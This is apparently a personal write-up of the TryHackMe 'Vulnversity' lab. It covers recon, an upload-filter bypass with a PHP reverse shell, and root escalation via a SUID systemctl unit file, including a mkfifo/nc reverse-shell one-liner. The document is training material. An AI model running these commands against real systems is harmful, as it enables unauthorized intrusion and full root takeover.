TRY HACK ME

TryHackMe: Cyber security training through short, gamified, real-world labs. Content for complete beginners and seasoned hackers.

Vulnversity

Write-Ups: n0w4n

Port/Version Scan

Mine:

nmap -vv -p- -sV -A [IP]

n0w4n's:

nmap -n -T4 -sS -sV -sC -oN nmap/portscan -p- 10.10.207.138

GoBuster (dirs)

Brute-force directories & files, DNS subdomains, and virtual host names.

    apt-get install gobuster
    wordlists under /usr/share/wordlists
    Syntax: gobuster dir -u http://<ip>:3333 -w <word list location>
    -e                Print the full URLs in your console
    -u                The target URL
    -w                Path to your wordlist
    -U and -P         Username and Password for Basic Auth
    -p <x>            Proxy to use for requests
    -c <http cookies> Specify a cookie for simulating your auth

n0w4n: Used DirSearch

dirsearch -u http://10.10.207.138:3333 -e php -x 400,404

Burp: Intruder

Burp Suite Intruder: Fuzz the /internal/ directory to see what kinds of file extensions it will allow you to upload.

n0w4n: Load the wordlist and don’t forget to disable the encode options. If you forget this, you will not have the proper result as your filename will be file%2ephp, which won’t work.

I did that… and it didn't work.

Reverse Shell

Obtain an exploit reverse shell to upload: pentestmonkey

You have to rename it .phtml to upload it.
Upload it.
Start a listener on your attack machine:

nc -lvnp 1234

# -l listener
# -v verbose
# -n numeric-only IPs, no DNS
# -p port (local port number)

Then execute the .phtml file on the target machine:

http:[IP]:3333/internal/uploads

Privilege Escalation

n0w4n: For a lot of CTFs, a good find are files with the SUID bit set.

find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null

# -l long listing format
# -d list directory names, not contents

Or use PEASS: PrivilegeEscalation Awesom Scripts Suite

Download
Linpeas: Linux local Privilege Escalation Awesome Script (.sh)

Discovered Vulnerability: systemctl is SUID root

Exploit

n0w4n: He said we did not have perms to write in the default systemctl dir, so he created the unit file as an ENVIRONMENT VARIABLE.

First we create a variable which holds a unique file (on target machine).

eop=$(mktemp).service

Then we create an unit file and write it into the variable. Inside the unit file we enter a command that will let the shell execute the command cat and redirect the output of cat to a file called output in the folder /tmp/.

echo '[Service]
> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
> [Install]
> WantedBy=multi-user.target' > $eop

And finally we use the /bin/systemctl program to enable the unit file.

/bin/systemctl link $eop
# Created symlink from /etc/systemd/system/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.

/bin/systemctl enable --now $eop
# Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.

Find it:

ls -lah /tmp

Alternative Exploit

To get a reverse root shell:

NOTE: the target machine is using netcat OpenBSD, NOT the traditional netcat. That means the -e (execute) flag will not work. See Netcat (Traditional) and **Netcat (OpenBSD)“ (OpenBSD netcat removed the -e flag “for security” ( link).

# nc (openbsd):
rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f

Create your unit file:

echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f"
[Install]
WantedBy=multi-user.target' > gk.service

Open a listener on your attack machine:

nc -lvnp 7777

Link and start the service:

/bin/systemctl link /tmp/gk.service         # need the full path
/bin/systemctl enable --now /tmp/gk.service

Done.

Table of Contents